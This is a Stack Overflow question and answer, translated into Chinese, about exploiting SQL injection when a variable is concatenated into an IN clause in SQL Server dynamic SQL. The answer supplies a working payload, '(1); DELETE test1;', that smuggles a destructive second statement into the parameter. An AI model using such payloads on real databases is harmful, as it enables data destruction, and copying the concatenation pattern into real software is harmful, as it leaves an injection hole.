我正在尝试利用以下 sql(在 SQL Server 2014 中):
declare @maliciousSQL nvarchar(max);
set @maliciousSQL = '???'
exec ('SELECT SUM(quantity) from mytable where id in ' + @maliciousSQL );
如何设计参数@maliciousSQL 来运行任意 sql?假设任务是执行命令 'truncate table othertable' - 它可行吗?
感谢任何人的帮助
最佳答案
SQL 注入(inject)看起来像这样:
declare @maliciousSQL nvarchar(max);
set @maliciousSQL = '(1); DELETE test1;'
exec ('SELECT SUM(quantity) from mytable where id in ' + @maliciousSQL );
用分号结束语句然后写你喜欢的
关于sql - 如何利用 "IN"条件内的 SQL 注入(inject)?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/44024086/